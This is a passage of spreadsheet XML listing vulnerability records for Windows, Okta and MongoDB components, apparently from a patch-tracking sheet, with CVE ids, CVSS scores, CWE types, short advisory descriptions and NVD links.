          <t>A use-after-free security issue in the cursor management component of MongoDB Server allows an authenticated user to cause a denial of service. Under specific timing conditions during cursor operations, a stale pointer to a freed resource may be retained and subsequently dereferenced during cursor cleanup, leading to a server process crash.</t>
        </is>
      </c>
      <c r="T410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82063</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70091</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K411" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q411" s="5" t="inlineStr"/>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S411" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70091</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78620</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K412" s="5" t="inlineStr"/>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q412" s="5" t="inlineStr"/>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S412" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway Kerberos configuration handler does not validate file paths specified in event payloads before writing file contents. The path from the event payload is used directly as the write destination, resulting in files being written to unintended locations on the appliance filesystem.</t>
        </is>
      </c>
      <c r="T412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78620</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68874</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K41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13" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q413" s="5" t="inlineStr"/>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S413" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68874</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69349</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K41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14" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q414" s="5" t="inlineStr"/>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S414" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Management Instrumentation allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69349</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69372</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K415" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q415" s="5" t="inlineStr"/>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S415" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Network File System allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69372</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69405</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K416" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q416" s="5" t="inlineStr"/>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S416" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="T416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69405</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69416</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K417" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q417" s="5" t="inlineStr"/>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S417" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="T417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69416</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69507</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K418" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q418" s="5" t="inlineStr"/>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>CWE-538</t>
        </is>
      </c>
      <c r="S418" s="5" t="inlineStr">
        <is>
          <t>Insertion of sensitive information into externally-accessible file or directory in Microsoft Windows Search Component allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69507</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69552</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K41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19" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q419" s="5" t="inlineStr"/>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="S419" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in Windows Print Spooler Components allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69552</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69569</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K42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0" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q420" s="5" t="inlineStr"/>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S420" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Print Spooler Components allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69569</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69572</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K42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1" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q421" s="5" t="inlineStr"/>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S421" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows SMB Client allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69572</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69591</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K42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22" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q422" s="5" t="inlineStr"/>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S422" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69591</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69637</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K423" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q423" s="5" t="inlineStr"/>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="S423" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="T423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69637</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69679</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K424" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L424" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q424" s="5" t="inlineStr"/>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="S424" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="T424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69679</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69723</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K42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5" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q425" s="5" t="inlineStr"/>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="S425" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69723</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78629</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q426" s="5" t="inlineStr"/>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="S426" s="5" t="inlineStr">
        <is>
          <t>The Okta Hyperdrive agent plugin returns a success response without a signed SAML assertion when the organization's policy requires no MFA for a given user. The response contains only a bare boolean validation indicator with no cryptographic artifact, resulting in an unverifiable authentication verdict being delivered to the relying application.</t>
        </is>
      </c>
      <c r="T426" s="6" t="inlineStr">
        <is>
